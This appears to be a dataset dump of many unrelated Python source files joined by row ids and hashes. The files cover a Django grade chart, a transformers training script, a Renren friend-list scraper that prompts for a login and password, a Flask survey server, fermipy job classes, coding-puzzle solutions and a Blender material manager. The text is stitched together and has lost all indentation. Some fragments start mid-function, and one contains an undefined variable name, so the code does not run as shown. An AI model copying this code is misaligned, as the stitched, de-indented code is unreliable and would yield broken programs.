# sum_kor = Table2.objects.aggregate(sum1=Sum('kor')) # {'sum1':500}
# sum_eng = Table2.objects.aggregate(sum1=Sum('eng')) # {'sum1':600}
# sum_math = Table2.objects.aggregate(sum1=Sum('math'))
# # SELECT SUM('kor') AS sum1 FROM MEMBER_TABLE2
# print(sum_kor)
# print('---------------------------------------------')
# print(sum_eng)
# print('---------------------------------------------')
# print(sum_math)
# print(type(sum_math))
# sum_kor = Table2.objects.filter(classroom='301').aggregate(sum1=Sum('kor'))
# sum_eng = Table2.objects.filter(classroom='301').aggregate(sum1=Sum('eng'))
# sum_math = Table2.objects.filter(classroom='301').aggregate(sum1=Sum('math'))
# print(sum_kor)
# print('---------------------------------------------')
# print(sum_eng)
# print('---------------------------------------------')
# print(sum_math)
# print(type(sum_math))
# sum_kor = Table2.objects.filter(kor__gt=80).aggregate(sum1=Sum('kor'))
# sum_eng = Table2.objects.filter(eng__gt=80).aggregate(sum1=Sum('eng'))
# sum_math = Table2.objects.filter(math__gt=80).aggregate(sum1=Sum('math'))
# # SELECT SUM('kor') FROM MEMBER_TABLE2 WHERE MATH>10
# #>gt, >=gte, <lt, <=lte
# print(sum_kor)
# print('---------------------------------------------')
# print(sum_eng)
# print('---------------------------------------------')
# print(sum_math)
# print(type(sum_math))
# sum_kor = Table2.objects.values('classroom').annotate(sum1=Sum('kor'), sum2=Sum('eng'), sum3=Sum('math'))
# sum_eng = Table2.objects.values('classroom').annotate(sum1=Sum('kor'), sum2=Sum('eng'), sum3=Sum('math'))
# sum_math = Table2.objects.values('classroom').annotate(sum1=Sum('kor'), sum2=Sum('eng'), sum3=Sum('math'))
# # SELECT SUM('kor') sum1, SUM('eng') sum2, SUM('math') sum3
# # FROM MEMBER_TABLE2
# # GROUP BY CLASSROOM
# print(sum_kor.query)
# # print(sum_eng.query)
# # print(sum_math.query)
# print('---------------------------------------------')
# df_kor = pd.DataFrame(sum_kor)
# df_eng = pd.DataFrame(sum_eng)
# df_math = pd.DataFrame(sum_math)
# DataFrame
# df_math = pd.DataFrame(sum_math)
# df_math = df_math.set_index("classroom")
# print(df_math)
# print(df_math.columns)
# df_math.plot(kind="bar")
# print(df_math)
#
# std 표준편차는 aggregate쓸 수 없다
# df.values.tolist()
font_name = font_manager.FontProperties\
(fname='C:/Windows/Fonts/gulim.ttc').get_name() # 폰트읽기
rc('font', family=font_name) # 폰트적용
plt.rcParams['figure.figsize']= (12, 4)
sql= '''
SELECT
CLASSROOM, SUM(kor) , SUM(eng), SUM(math)
FROM MEMBER_TABLE2
GROUP BY CLASSROOM
'''
print(sql)
cursor.execute(sql)
score = cursor.fetchall()
print(score)
print(score[0][0])
#
group=[]
ksum=[]
esum=[]
msum=[]
for i in score:
group.append(i[0])
ksum.append(i[1])
esum.append(i[2])
msum.append(i[3])
# group = [score[0][0], score[1][0], score[2][0], score[3][0]]
# ksum = [score[0][1], score[1][1], score[2][1], score[3][1]]
# esum = [score[0][2], score[1][2], score[2][2], score[3][2]]
# msum = [score[0][3], score[1][3], score[2][3], score[3][3]]
plt.title("과목 평균")
plt.xlabel("과목")
plt.ylabel("점수")
plt.bar(group, ksum)
plt.bar(group, esum)
plt.bar(group, msum)
# plt.show() # 웹에서 사용 불가
plt.draw() # 안보이게 그림을 캡쳐
img = io.BytesIO() # img에 byte배열로 보관
plt.savefig(img, format='png') # png파일 포멧으로 저장
img_url = base64.b64encode(img.getvalue()).decode()
plt.close() # 그래프종료
return render(request, 'member/graph.html',
{"graph":'data:;base64,{}'.format(img_url)})
# <img src='{{graph}}' /> # graph.html에서 |
994,943 | 6bb27baeea58f8c456c79b8cd3801ae773aac497 | import pickle as pickle
import os
import pandas as pd
import torch
import argparse
import glob
import json
import time
import numpy as np
import random
from attrdict import AttrDict
from sklearn.metrics import accuracy_score
from transformers import AutoTokenizer, BertForSequenceClassification, Trainer, TrainingArguments, BertConfig
from transformers import AutoModelForSequenceClassification, AutoConfig
from transformers import ElectraTokenizer, ElectraForSequenceClassification, ElectraConfig
from transformers import XLMRobertaConfig, XLMRobertaTokenizer, XLMRobertaForSequenceClassification
from torch.utils.tensorboard import SummaryWriter
from transformers.integrations import TensorBoardCallback
from load_data import *
def seed_everything(seed):
torch.manual_seed(seed)
torch.cuda.manual_seed(seed)
torch.cuda.manual_seed_all(seed) # if use multi-GPU
torch.backends.cudnn.deterministic = True
torch.backends.cudnn.benchmark = False
np.random.seed(seed)
random.seed(seed)
# 평가를 위한 metrics function.
def compute_metrics(pred):
label = pred.label_ids
preds = pred.predictions.argmax(-1)
# calculate accuracy using sklearn's function
acc = accuracy_score(label, preds)
return {
'accuracy': acc,
}
"""
class testTrainer(Trainer):
def __init__(self):
self.criterion = torch.nn.BCEWithLogitsLoss()
def compute_loss(self, model, inputs, return_outputs=False):
label = inputs.pop('label')
test_targets = torch.zeros((len(label), 41))
for l in range(len(label)):
if label[l] == 0:
test_targets[l, :] = 1/41
else:
idx = label[l]-1
test_targets[l, idx] = 1
test_outputs = model(**inputs)
print(test_outputs)
loss = self.criterion(test_outputs, test_targets)
print(test_targets)
exit(0)
return (loss, test_outputs) if return_outputs else loss
"""
class testTrainer(Trainer):
def compute_loss(self, model, inputs, return_outputs=False):
label = inputs.pop("label")
outputs = model(**inputs)
logits = outputs.logits
loss_fct = torch.nn.BCEWithLogitsLoss()
test_targets = torch.zeros((len(label), 41), device='cuda:0')
for l in range(len(label)):
if label[l] == 0:
test_targets[l, :] = 1 / 41
else:
idx = label[l] - 1
test_targets[l, idx] = 1
loss = loss_fct(logits, test_targets)
return (loss, outputs) if return_outputs else loss
def train(args):
seed = args['seed']
save_dir = args['output_dir']
logging_dir = args['logging_dir']
MODEL_NAME = args['MODEL_NAME']
epochs = args['EPOCH']
optimizer_name = args['optimizer']
learning_rate = args['learning_rate']
batch_size = args['batch_size']
rtq = args['rtq']
two_sentence = args['two_sentence']
except_0 = args['except_0']
entity_token = args['entity_token']
seed_everything(seed)
# load model and tokenizer
if 'xlm' in MODEL_NAME:
tokenizer = XLMRobertaTokenizer.from_pretrained(MODEL_NAME, additional_special_tokens=['[E1]', '[E2]', '[E1-NER]', '[E2-NER]'])
tokenizer = AutoTokenizer.from_pretrained(MODEL_NAME, additional_special_tokens=['[E1]', '[E2]', '[E1-NER]', '[E2-NER]'])
if entity_token == 'on':
train_dataset = ner_load_data("/opt/ml/input/data/train/ner_train_normalize.csv")
#train_dataset = ner_load_data("/opt/ml/input/data/train/ner_train_ver2.tsv")
else:
# load dataset
train_dataset = load_data("/opt/ml/input/data/train/train.tsv")
# dev_dataset = load_data("./dataset/train/dev.tsv")
train_label = train_dataset['label'].values
# dev_label = dev_dataset['label'].values
if rtq == 'on':
tokenized_train = rtq_tokenized_dataset(train_dataset, tokenizer)
processed_dataset = RtQDataset(tokenized_train, train_label)
elif two_sentence == 'on':
tokenized_train = two_sentence_tokenized_dataset(train_dataset, tokenizer)
processed_dataset = TwoSentenceDataset(tokenized_train, train_label)
elif entity_token == 'on':
#tokenized_train = tokenized_dataset(train_dataset, tokenizer)
#processed_dataset = RE_Dataset(tokenized_train, train_label)
#tokenized_train = single_tokenized_dataset(train_dataset, tokenizer)
tokenized_train = ner_tokenized_dataset(train_dataset, tokenizer)
processed_dataset = RE_Dataset(tokenized_train, train_label)
else:
# tokenizing dataset
tokenized_train = tokenized_dataset(train_dataset, tokenizer)
# tokenized_dev = tokenized_dataset(dev_dataset, tokenizer)
# make dataset for pytorch.
processed_dataset = RE_Dataset(tokenized_train, train_label)
# processed_dataset = RE_Dataset(tokenized_dev, dev_label)
device = torch.device('cuda:0' if torch.cuda.is_available() else 'cpu')
# setting model hyperparameter
config = AutoConfig.from_pretrained(MODEL_NAME)
if 'xlm' in MODEL_NAME:
config = XLMRobertaConfig.from_pretrained((MODEL_NAME))
if rtq == 'on':
config.num_labels = 2
elif except_0 == 'on':
config.num_labels = 41
else:
config.num_labels = 42
if 'xlm' in MODEL_NAME:
model = XLMRobertaForSequenceClassification.from_pretrained(MODEL_NAME, config=config)
else:
model = AutoModelForSequenceClassification.from_pretrained(MODEL_NAME, config=config)
model.resize_token_embeddings(len(tokenizer))
"""
if 'electra' in MODEL_NAME:
electra_config = ElectraConfig.from_pretrained(MODEL_NAME)
electra_config.num_label = 42
model = ElectraForSequenceClassification.from_pretrained(MODEL_NAME, config=electra_config)
elif 'bert' in MODEL_NAME:
bert_config = BertConfig.from_pretrained(MODEL_NAME)
bert_config.num_label = 42
model = BertForSequenceClassification.from_pretrained(MODEL_NAME, config=bert_config)
"""
print(processed_dataset[0])
print(processed_dataset[1])
model.parameters
model.to(device)
#tb_writer = SummaryWriter(log_dir=save_dir)
#logger = TensorBoardCallback(tb_writer)
# 사용한 option 외에도 다양한 option들이 있습니다.
# https://huggingface.co/transformers/main_classes/trainer.html#trainingarguments 참고해주세요.
training_args = TrainingArguments(
output_dir=save_dir, # output directory
save_total_limit=3,# number of total save model.
save_strategy='epoch',
#save_steps=500, # model saving step.
num_train_epochs=epochs, # total number of training epochs
learning_rate=learning_rate, # learning_rate
per_device_train_batch_size=batch_size, # batch size per device during training
# per_device_eval_batch_size=16, # batch size for evaluation
warmup_steps=500, # number of warmup steps for learning rate scheduler
weight_decay=0.01, # strength of weight decay
logging_dir=logging_dir, # directory for storing logs
logging_steps=100, # log saving step.
# evaluation_strategy='steps', # evaluation strategy to adopt during training
# `no`: No evaluation during training.
# `steps`: Evaluate every `eval_steps`.
# `epoch`: Evaluate every end of epoch.
# eval_steps = 500, # evaluation step.
label_smoothing_factor=0.5
)
if except_0 == 'on':
trainer = testTrainer(
model=model, # the instantiated 🤗 Transformers model to be trained
args=training_args, # training arguments, defined above
train_dataset=processed_dataset, # training dataset
# eval_dataset=RE_dev_dataset, # evaluation dataset
# compute_metrics=compute_metrics # define metrics function
)
else:
trainer = Trainer(
model=model, # the instantiated 🤗 Transformers model to be trained
args=training_args, # training arguments, defined above
train_dataset=processed_dataset, # training dataset
# eval_dataset=RE_dev_dataset, # evaluation dataset
# compute_metrics=compute_metrics # define metrics function
)
# train model
trainer.train()
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('--config_file', type=str, required=True)
args = parser.parse_args()
with open(args.config_file) as f:
args = AttrDict(json.load(f))
print(args)
train(args)
|
994,944 | 2f000b46fdf55d9ed9e3c06e8021facfd92fce00 | #import time
from rrBrowser import RenrenBrowser
from rrParser import RenrenParser
#from rrDB import RenrenDb
from rrRecorder import RenrenRecorder
storePath = 'D:/Projects/NetSci/U&I/data'
rrID = input("Your Renren ID (e.g.239486743): ")
rrUser = input("Your Renren Login Email: ")
rrPassword = input("Your Renren Password: ")
#db = RenrenDb()
browser = RenrenBrowser(user=rrUser, passwd=rrPassword, path=storePath)
browser.setLogLevel(40)
browser.login()
recorder = RenrenRecorder(path=browser.getPwdRoot(), writeBack=True)
parser = RenrenParser(browser, recorder)
#print(len(recorder.getFriends(rrID)))
#net1
browser.friendListPage(rrID)
parser.friends()
recorder.save()
#net2
#flist = db.getRenrenId(2, rrID)
myFriends = recorder.getFriends(rrID)
cnt = 0
for myFriend in myFriends:
#loopStart=time.time()
browser.friendListPage(myFriend)
print("{}: {}'s friendship grabbed".format(cnt, myFriend))
cnt = cnt+1
#loopEnd=time.time()
#if (loopEnd-loopStart<10):
# print('loop time={},parsering to kill time'.format(loopEnd-loopStart))
# parser.friends()
# kill=time.time()
# print('time cost ={}'.format(kill-loopEnd))
parser.friends()
|
994,945 | 7cae3d4f42e3c2cc6406b31076691dafb2740c26 | from os.path import expanduser
import numpy as np
import pandas as pd
import re
import collections
import time
class ElapsedTimer(object):
def __init__(self):
self.start_time = time.time()
def elapsed(self,sec):
if sec < 60:
return str(sec) + " sec"
elif sec < (60 * 60):
return str(sec / 60) + " min"
else:
return str(sec / (60 * 60)) + " hr"
def elapsed_time(self):
print("The running time of this code: %s " % self.elapsed(time.time() - self.start_time) )
def csv2ndarray(feature_path,feature_files):
feature_input = []
for i in range(len(feature_files)):
new_mat = pd.read_csv(feature_path+feature_files[i], sep=',',index_col=False,header=None)
new_mat = new_mat.as_matrix()
new_mat = new_mat.reshape(new_mat.shape[0],new_mat.shape[1])
feature_input.append(new_mat)
feature_input_ndarray = np.array(feature_input,np.float)
return(feature_input_ndarray)
def tsv2ndarray(feature_path,feature_files):
feature_input = []
for i in range(len(feature_files)):
new_mat = pd.read_csv(feature_path+feature_files[i], sep='\t',index_col=False,header=None)
new_mat = new_mat.as_matrix()
new_mat = new_mat.reshape(new_mat.shape[0],new_mat.shape[1])
feature_input.append(new_mat)
feature_input_ndarray = np.array(feature_input)
return(feature_input_ndarray)
def get_abs_path(input_path):
home = expanduser("~")
if re.match(r'^[A-Z]',home) :
home = home + '\\Documents'
input_path = re.sub(r'~',home,input_path)
return(input_path)
def viz_model(Data,base_dir,Type,epochs):
Gen_history=Data['generator']
Dis_history=Data['discriminator']
Gen_history=np.array(Gen_history,dtype=float)
Dis_history=np.array(Dis_history,dtype=float)
image_dir=base_dir+'GANs_result/Loss_value/'+Type+'_'+str(epochs)+'.jpg'
import matplotlib.pyplot as plt
plt.plot(Gen_history[:,1])
plt.plot(Gen_history[:,2])
plt.plot(Dis_history[:,1])
plt.plot(Dis_history[:,2])
plt.title('GrapheneGANs_loss')
plt.ylabel('Loss_Value')
plt.xlabel('Epoch_Num')
plt.legend(['Gen_Loss','Gen_aux','Dis_Loss','Dis_aux'], loc='upper left')
plt.savefig(image_dir)
plt.show()
plt.close()
def flatten(l):
for el in l:
if isinstance(el, collections.Iterable) and not isinstance(el, (str, bytes)):
yield from flatten(el)
else:
yield el
def cartesian_iterative(pools):
result = [[]]
for pool in pools:
result = [x+[y] for x in result for y in pool]
return result |
994,946 | 549795d81766a144e827d9ce9abb642074c89efc | #!/usr/bin/python
import urllib
import re
class StockQuote:
def get_quote(self, symbol):
data = []
url = 'http://finance.yahoo.com/d/quotes.csv?s='
#for s in symbols:
# url += s+"+"
#url = url[0:-1]
url += symbol
url += "&f=sb3b2l1l"
f = urllib.urlopen(url,proxies = {})
rows = f.read()
values = [x for x in rows.split(',')]
#symbol = values[0][1:-1]
#bid = values[1]
#ask = values[2]
#last = values[3]
#data.append([symbol,bid,ask,last,values[4]])
#return data
return values
if __name__ == '__main__':
sq = StockQuote()
print sq.get_quote('AAPL')
|
994,947 | a2478f843f7b07bec3066148836ce7465fd9d929 | from collections import defaultdict
from collections import Counter
import collections
import enum
from re import A
#import numpy as np
import sys
import argparse
import math
import random
from tkinter import N
# https://www.daleseo.com/python-typing/
from typing import Optional
from typing import Union
from typing import List
from typing import Final
from typing import Dict
from typing import Tuple
from typing import Set
import time
# getSmallestString.py : https://github.com/cheoljoo/problemSolving/tree/master/leetcode
timeFlag = 0
debugFlag = 0
import math
class Solution:
def getSmallestString(self, n: int, k: int) -> str:
z = self.getNum('z')
zNum = 0
while True:
countOfZ = (k - n) // z
zNum += countOfZ
remainN = n - countOfZ
remainK = k - countOfZ * z
if remainK - remainN >= z :
k = remainK
n = remainN
else :
break
if remainN == remainK :
return 'a'*(remainN) + 'z'*zNum
else :
i = remainK - (remainN-1)
return 'a'*(remainN-1) + chr(i + ord('a')-1) + 'z'*zNum
return ''
def getNum(self,ch) -> int :
return ord(ch) - ord('a') + 1
def run(s,s1,expect):
start = time.time()
A = Solution()
r = A.getSmallestString(s,s1)
print(" total_time1 : ", time.time() - start , "-> ", end="")
if r == expect:
print("SUCCESS -> ",end="")
else :
print("ERROR(",expect,") -> ",sep="",end="")
print(r, s , end="")
print()
if (__name__ == "__main__"):
parser = argparse.ArgumentParser(
prog='getSmallestString.py',
description=
'getSmallestString'
)
parser.add_argument( '--debug', '-d' , action='store_const' , const=1 , help='debug on')
args = parser.parse_args()
debug = args.debug
if not debug:
debug = 0
print('getSmallestString problem :')
run(3,27,'aay')
run(5,73,'aaszz')
run(50,80,'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaafz')
run(1,26,'z')
run(1,2,'b')
run(2,52,'zz')
run(3,3,"aaa")
run(90,200,"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaakzzzz")
run(90,1121,"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaagzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz")
|
994,948 | 73dfb95a858941903b436b4ef50c903da0936d69 | """
The server for Reddit poll
"""
import json
from datetime import datetime
import sqlite3
from contextlib import closing
from flask import Flask, render_template, request, send_from_directory
from flask import g, url_for
from numpy import base_repr
app = Flask(__name__, static_url_path="")
"""
create table user(
roll text primary key,
name text);
create table survey(
user text,
subreddit text,
value integer);
"""
DATABASE = "./data.sqlite3"
SUBREDDIT_FILE = "./final_subs.txt"
USER_JSONFILE = './user-reddit.json'
POSTS_LINK_FILE = './final_post_data.json'
DEFAULT_PARAMS = {
"survey": {
"title": "Identifying sources of value for subreddits",
"description": (
"Survey on categorizing post-based/comment-based subreddits"
"in Reddit."),
}
}
post_link_data = {}
with open(POSTS_LINK_FILE) as pobj:
post_link_data = json.load(pobj)
with open(SUBREDDIT_FILE) as fobj:
subreddits = fobj.read().split()
def read_json():
"""Read the json file to get key_data information"""
global key_data
with open(USER_JSONFILE) as fobj:
key_data = json.load(fobj)
read_json()
def connect_db():
"""Simple connection to sqlite databse"""
return sqlite3.connect(DATABASE)
def init_db():
"""Initalize db -- call from main initally """
with closing(connect_db()) as db:
with app.open_resource('schema.sql') as fobj:
db.cursor().executescript(fobj.read())
db.commit()
@app.before_request
def before_request():
"""connect to db and close connection at the end"""
g.db = connect_db()
@app.after_request
def after_request(response):
"""connect to db and close connection at the end"""
g.db.close()
return response
def query_db(query, args=(), one=False):
"""custom query wrapper over raw query"""
cur = g.db.execute(query, args)
g.db.commit()
rv = [dict((cur.description[idx][0], value)
for idx, value in enumerate(row)) for row in cur.fetchall()]
return (rv[0] if rv else None) if one else rv
@app.route('/components/<path:path>')
def send_js(path):
"""serve static files"""
return send_from_directory('bower_components', path)
@app.route('/css/<path:path>')
def send_css(path):
"""serve static files"""
return send_from_directory('css', path)
@app.route('/')
def root():
"""Base url display instructions for user with key c"""
params = dict(DEFAULT_PARAMS)
key = request.args.get('c', None)
if key is None or key not in key_data:
return render_template('error.html.jinja2', **params)
params.update({
"next_page": url_for("survey_begin", c=key),
"participant": key_data[key]['participant'],
"npages": key_data[key]['npages']
})
return render_template('instructions.html.jinja2', **params)
@app.route('/start_survey')
def survey_begin():
"""Base url start the survey for user with key c"""
c = request.args.get('c')
params = dict(DEFAULT_PARAMS)
post_links = []
sub = subreddits[key_data[c]['index']]
for id, data in post_link_data[sub].items():
num = base_repr(int(id), 36)
link = "https://reddit.com/r/" + sub + "/comments/" + num
post_links.append((link, data))
params.update({
"c": c,
"subreddit": subreddits[key_data[c]['index']],
"id": key_data[c]['index'],
"nmore": key_data[c]['npages'],
"percent": 0,
"post_links": post_links
})
return render_template('poll.html.jinja2', **params)
@app.route('/poll/<int:id>')
def poll(id):
"""The polling storage method for user with key c and for sequence id """
params = dict(DEFAULT_PARAMS)
key = request.args.get('c')
allparams = request.args.items()
subreddit = subreddits[id]
for param in allparams:
if param[0] == 'c' or param[0] == 'subreddit':
continue
else:
query_db("insert into link_value values(?,?,?,?)",
[key, param[0], param[1], datetime.utcnow()])
if id + 1 >= key_data[key]['npages'] + key_data[key]['index']:
params.update({
"participant": key_data[key]['participant']
})
return render_template('finish.html.jinja2', **params)
else:
sub = subreddits[id + 1]
post_links = []
for num, data in post_link_data[sub].items():
num = base_repr(int(num), 36)
link = "https://reddit.com/r/" + sub + "/comments/" + num
post_links.append((link, data))
params.update({
"c": key,
"subreddit": subreddits[id + 1],
"id": id + 1,
"nmore": key_data[key]['npages'] - (id - key_data[key]['index'] + 1),
"percent": float(id - key_data[key]['index'] + 1) / key_data[key]['npages'] * 100,
"post_links": post_links
})
return render_template('poll.html.jinja2', **params)
if __name__ == "__main__":
app.run(debug=True)
|
994,949 | 543bcb463041f37e84c10279ec685045e9285d4b | # finance_data.py
# tutorial: https://www.freecodecamp.org/news/how-to-scrape-websites-with-python-and-beautifulsoup-5946935d93fe/
# Import libs
from bs4 import BeautifulSoup as BS
import requests as r
from selenium import webdriver
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
# read data from Bloomberg Website
source = "https://www.bloomberg.com/quote/SPX:IND"
browser = webdriver.Firefox(executable_path='/usr/local/share/gecko_driver/geckodriver')
try:
browser.get(source)
print("success")
except:
print("WTF")
textlist = browser.find_elements_by_tag_name("span")
for text_elements in textlist:
text = text_elements.text
print(text)
# delay = 3
# WebDriverWait(browser, delay).until(EC.presence_of_element_located(browser.find_elements_by_id("a")))
# Parse data from website
# soup = BS(, "html.parser")
# elements = soup.select("div > span")
# print(soup.prettify())
# --------end of basic web scraping---------
# find finance data on Bloomberg website
#name_box = soup.find("h1", attrs={"class": "companyName__99a4824b"})
#name = name_box.text.strip()
#print(name)
# seems like the web page is not parsed properly since there is no companyname in xml view included. |
994,950 | a29fe86bc1b45f6beede19e51634656eaa0125c0 | import app
app = app.APP()
app.main()
|
994,951 | 2ed85d6999f988d3023ba7d2b3b61d8b906581d5 | """
shyness = [n, m, k, ...]
1) sort in ascending order of shyness
2) find first person who won't stand and add enough people to make him/her stand
and iterate
- accumulate number of standing people as you pass down the sorted list
"""
def solve(shyness_counts):
"return number of friends added"
n_standing = 0
n_friends_added = 0
for shyness,count in enumerate(shyness_counts):
if count != 0:
if shyness <= n_standing:
# then those people stand
n_standing += count
else:
# then we add the minimal number of friends to get them standing
n_more_friends_to_add = (shyness - n_standing)
n_friends_added += n_more_friends_to_add
n_standing += (n_more_friends_to_add + count)
return n_friends_added
def std_in():
while True:
yield raw_input()
def main():
STD_IN = std_in()
T = int(next(STD_IN).strip())
for t in xrange(T):
s_max, shyness_counts = next(STD_IN).strip().split()
solution = solve(map(int, shyness_counts))
print 'Case #{}: {}'.format(t+1, solution)
if __name__ == '__main__':
main()
|
994,952 | 9b4dd65e040249f1041113177aa44598574e4a9e | #!/usr/bin/env python
#
"""
Prepare data for diffuse all-sky analysis
"""
import os
import copy
from collections import OrderedDict
import yaml
from fermipy.jobs.utils import is_null
from fermipy.jobs.link import Link
from fermipy.jobs.chain import Chain
from fermipy.jobs.scatter_gather import ScatterGather
from fermipy.jobs.slac_impl import make_nfs_path
from fermipy.diffuse.utils import create_inputlist
from fermipy.diffuse.name_policy import NameFactory
from fermipy.diffuse.binning import Component
from fermipy.diffuse import defaults as diffuse_defaults
from fermipy.diffuse.job_library import Gtlink_ltsum, Link_FermipyCoadd
NAME_FACTORY = NameFactory()
def _make_input_file_list(binnedfile, num_files):
"""Make the list of input files for a particular energy bin X psf type """
outdir_base = os.path.abspath(os.path.dirname(binnedfile))
outbasename = os.path.basename(binnedfile)
filelist = ""
for i in range(num_files):
split_key = "%06i" % i
output_dir = os.path.join(outdir_base, split_key)
filepath = os.path.join(output_dir,
outbasename.replace('.fits', '_%s.fits' % split_key))
filelist += ' %s' % filepath
return filelist
class CoaddSplit(Chain):
"""Small class to merge counts cubes for a series of binning components
This chain consists multiple `Link` objects:
coadd-EBIN-ZCUT-FILTER-EVTYPE : `_Link_FermipyCoadd`
Link to coadd data of a particular type.
"""
appname = 'fermipy-coadd-split'
linkname_default = 'coadd-split'
usage = '%s [options]' % (appname)
description = 'Merge a set of counts cube files'
default_options = dict(comp=diffuse_defaults.diffuse['comp'],
data=diffuse_defaults.diffuse['data'],
do_ltsum=(False, 'Sum livetime cube files', bool),
nfiles=(96, 'Number of input files', int),
dry_run=(False, 'Print commands but do not run them', bool))
__doc__ += Link.construct_docstring(default_options)
def __init__(self, **kwargs):
"""C'tor
"""
super(CoaddSplit, self).__init__(**kwargs)
self.comp_dict = None
def _map_arguments(self, args):
"""Map from the top-level arguments to the arguments provided to
the indiviudal links """
comp_file = args.get('comp', None)
datafile = args.get('data', None)
do_ltsum = args.get('do_ltsum', False)
NAME_FACTORY.update_base_dict(datafile)
outdir_base = os.path.join(NAME_FACTORY.base_dict['basedir'], 'counts_cubes')
num_files = args.get('nfiles', 96)
self.comp_dict = yaml.safe_load(open(comp_file))
coordsys = self.comp_dict.pop('coordsys')
for key_e, comp_e in sorted(self.comp_dict.items()):
if 'mktimefilters' in comp_e:
mktimelist = comp_e['mktimefilters']
else:
mktimelist = ['none']
if 'evtclasses' in comp_e:
evtclasslist_vals = comp_e['evtclasses']
else:
evtclasslist_vals = [NAME_FACTORY.base_dict['evclass']]
for mktimekey in mktimelist:
zcut = "zmax%i" % comp_e['zmax']
kwargs_mktime = dict(zcut=zcut,
ebin=key_e,
psftype='ALL',
coordsys=coordsys,
mktime=mktimekey)
if do_ltsum:
ltsum_listfile = 'ltsumlist_%s_%s' % (key_e, mktimekey)
ltsum_outfile = 'ltsum_%s_%s' % (key_e, mktimekey)
linkname = 'ltsum_%s_%s' % (key_e, mktimekey)
self._set_link(likname, Gtlink_ltsum,
infile1=ltsum_listfile,
infile2=None,
outfile=ltsum_outfile,
logfile=os.path.join(outdir_base, "%s.log" % linkname))
for evtclassval in evtclasslist_vals:
for psf_type in sorted(comp_e['psf_types'].keys()):
fullkey = "%s_%s_%s_%s"%(key_e, mktimekey, evtclassval, psf_type)
linkname = 'coadd_%s' % (fullkey)
kwargs_bin = kwargs_mktime.copy()
kwargs_bin['psftype'] = psf_type
kwargs_bin['evclass'] = evtclassval
ccube_name =\
os.path.basename(NAME_FACTORY.ccube(**kwargs_bin))
outputfile = os.path.join(outdir_base, ccube_name)
args = _make_input_file_list(outputfile, num_files)
self._set_link(linkname,
Link_FermipyCoadd,
args=args,
output=outputfile,
logfile=os.path.join(outdir_base, "%s.log" % linkname))
class CoaddSplit_SG(ScatterGather):
"""Small class to generate configurations for fermipy-coadd
"""
appname = 'fermipy-coadd-split-sg'
usage = "%s [options]" % (appname)
description = "Submit fermipy-coadd-split- jobs in parallel"
clientclass = Link_FermipyCoadd
job_time = 300
default_options = dict(comp=diffuse_defaults.diffuse['comp'],
data=diffuse_defaults.diffuse['data'],
ft1file=(None, 'Input FT1 file', str))
__doc__ += Link.construct_docstring(default_options)
def build_job_configs(self, args):
"""Hook to build job configurations
"""
job_configs = {}
components = Component.build_from_yamlfile(args['comp'])
datafile = args['data']
if datafile is None or datafile == 'None':
return job_configs
NAME_FACTORY.update_base_dict(args['data'])
outdir_base = os.path.join(NAME_FACTORY.base_dict['basedir'], 'counts_cubes')
inputfiles = create_inputlist(args['ft1file'])
num_files = len(inputfiles)
for comp in components:
zcut = "zmax%i" % comp.zmax
mktimelist = copy.copy(comp.mktimefilters)
if not mktimelist:
mktimelist.append('none')
evtclasslist_keys = copy.copy(comp.evtclasses)
if not evtclasslist_keys:
evtclasslist_vals = [NAME_FACTORY.base_dict['evclass']]
else:
evtclasslist_vals = copy.copy(evtclasslist_keys)
for mktimekey in mktimelist:
for evtclassval in evtclasslist_vals:
fullkey = comp.make_key(
'%s_%s_{ebin_name}_%s_{evtype_name}' %
(evtclassval, zcut, mktimekey))
name_keys = dict(zcut=zcut,
ebin=comp.ebin_name,
psftype=comp.evtype_name,
coordsys=comp.coordsys,
irf_ver=NAME_FACTORY.irf_ver(),
mktime=mktimekey,
evclass=evtclassval,
fullpath=True)
ccube_name = os.path.basename(NAME_FACTORY.ccube(**name_keys))
outfile = os.path.join(outdir_base, ccube_name)
infiles = _make_input_file_list(outfile, num_files)
logfile = make_nfs_path(outfile.replace('.fits', '.log'))
job_configs[fullkey] = dict(args=infiles,
output=outfile,
logfile=logfile)
return job_configs
def register_classes():
"""Register these classes with the `LinkFactory` """
CoaddSplit.register_class()
CoaddSplit_SG.register_class()
|
994,953 | 25625841dd4d653e41453f36a832d739323d4136 | import sys
from os.path import join
from pathlib import Path
import importlib
import math
import random
import bpy
sys.path.append('/work/vframe_synthetic/vframe_synthetic')
from app.utils import log_utils, color_utils
importlib.reload(log_utils)
importlib.reload(color_utils)
from app.blender.materials import colorfill
importlib.reload(colorfill)
# reload application python modules
# shortcuts
log = log_utils.Logger.getLogger()
ColorFillMaterial = colorfill.ColorFillMaterial
# ---------------------------------------------------------------------------
# Manage ground
# ---------------------------------------------------------------------------
class GroundManager:
'''Manages ground material switching'''
def __init__(self, cfg):
cfg_ground = cfg.get('ground', {})
self._iterations = len(cfg_ground.get('materials', []))
self.ground_materials = cfg_ground.get('materials', [])
self.ground_objects = self.generate_placeholders(cfg_ground)
def generate_placeholders(self, cfg):
'''Generates list of object names in this particle system'''
placeholders = {}
for o in cfg.get('objects', []):
obj_name = o.get('name')
obj_scene = bpy.data.objects.get(obj_name)
if not obj_scene:
log.error(f'{obj_name} is not an object in this scene')
o['default_material'] = obj_scene.active_material.name
o['material_slots_defaults'] = [ms.material.name for ms in obj_scene.material_slots]
o['unmask_material'] = o['default_material']
# o['ground_materials'] = self.ground_materials
o['ground_materials'] = o.get('material')
cf_mat_name = f'mat_{obj_name}_colorfill'
if not cf_mat_name in bpy.data.materials.keys():
color = color_utils.rgb_packed_to_rgba_norm(o.get('color', 0x000000))
cfm = ColorFillMaterial(cf_mat_name, color)
o['colorfill_material'] = cf_mat_name
placeholders[obj_name] = o
return placeholders
def mask(self):
'''Changes object materials to colorfill'''
for name, base_obj in self.ground_objects.items():
mat_name = base_obj.get('colorfill_material')
cf_mat = bpy.data.materials.get(mat_name)
obj_scene = bpy.data.objects.get(name)
obj_scene.active_material = cf_mat
for ms in obj_scene.material_slots:
ms.material = cf_mat
def unmask(self):
for name, base_obj in self.ground_objects.items():
